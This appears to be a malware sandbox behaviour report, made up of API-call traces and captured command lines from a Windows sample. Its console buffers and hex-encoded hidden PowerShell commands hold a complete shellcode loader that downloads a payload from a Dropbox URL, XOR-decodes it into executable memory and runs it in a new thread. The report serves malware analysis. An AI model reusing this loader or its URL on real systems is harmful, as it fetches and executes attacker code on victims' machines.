 buffer: alProtect(IntPtr a,uint b,uint c,out IntPtr d);';$aab=Add-Type -MemberDefinitio
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: n $abab -Name "AAB" -PassThru;$c = New-Object System.Net.WebClient;$d="https://
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: dl.dropboxusercontent.com/scl/fi/3vdz6tw94x6x1xdbf6oap/20231002.zip?rlkey=9q6pf
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: 41sox0kcw4l3w3lb2hvu&dl=0";$bb='[DllImport("kernel32.dll")]public static extern
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: IntPtr CreateThread(IntPtr a,uint b,IntPtr c,IntPtr d,uint e,IntPtr f);';$ccc=
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: Add-Type -MemberDefinition $bb -Name "BBB" -PassThru;$ddd='[DllImport("kernel32
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: .dll")]public static extern IntPtr WaitForSingleObject(IntPtr a,uint b);';$fff=
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: Add-Type -MemberDefinition $ddd -Name "DDD" -PassThru;$e=112;do { try { $c.Hea
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: ders["user-agent"] = "connnecting...";$xmpw4=$c.DownloadData($d);$x0 = $b::Glob
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: alAlloc(0x0040, $xmpw4.Length+0x100);$old = 0;$aab::VirtualProtect($x0, $xmpw4.
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: Length+0x100, 0x40, [ref]$old);for ($h = 1;$h -lt $xmpw4.Length;$h++) {[System.
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: Runtime.InteropServices.Marshal]::WriteByte($x0, $h-1, ($xmpw4[$h] -bxor $xmpw4
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: [0]) );};try{throw 1;}catch{$handle=$ccc::CreateThread(0,0,$x0,0,0,0);$fff::Wai
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: tForSingleObject($handle, 500*1000);};$e=222;}catch{sleep 11;$e=112;}}while($e
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: -eq 112);
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x0000012b
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x00000137
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059d118
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059d958
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059d958
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059d958
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059db18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059db18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059db18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059db18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059db18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059db18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059cf58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059cf58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059cf58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059d958
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059d958
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059d958
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059d818
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059d958
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059d958
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059d958
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059d958
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059d958
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059d958
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059d958
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059dc98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059dc98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059dc98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059dc98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059dc98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059dc98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059dc98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059dc98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059dc98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059dc98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059dc98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059dc98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059dc98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059dc98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059dbd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059dbd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059dbd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059dbd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059dbd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059dbd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059dbd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059dbd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0084ea48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0084ea48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00865ec8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00865f08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 1507328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02930000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02662000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02672000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a61000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a62000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02673000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02674000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02692000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02675000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02676000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02693000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02694000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02695000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02696000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02697000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02698000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02699000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05030000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05031000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05032000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05033000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05034000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05035000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05036000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05037000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05038000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05039000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05041000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05044000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file c:\Users\test22\AppData\Local\Temp\zucfn5_i.dll
file c:\Users\test22\AppData\Local\Temp\0hodn2ty.dll
file c:\Users\test22\AppData\Local\Temp\zber1qmo.dll
file c:\Users\test22\AppData\Local\Temp\l9fffhn5.dll
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline c:\\Windows\\SysWOW64\\cmd.exe /c for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a -windowstyle hidden -command "$gattecaqq ="$radetaa="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F3376647A36747739347836783178646266366F61702F32303233313030322E7A69703F726C6B65793D39713670663431736F78306B6377346C3377336C623268767526646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$harsan="""""";for($i=0;$i -le $radetaa.Length-2;$i=$i+2){$MMOMM=$radetaa[$i]+$radetaa[$i+1];$harsan= $harsan+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($harsan));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($gattecaqq));while(true){}"
cmdline C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -command "$gattecaqq ="$radetaa="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F3376647A36747739347836783178646266366F61702F32303233313030322E7A69703F726C6B65793D39713670663431736F78306B6377346C3377336C623268767526646C3D30223B2462623D275B446C6C496D706F727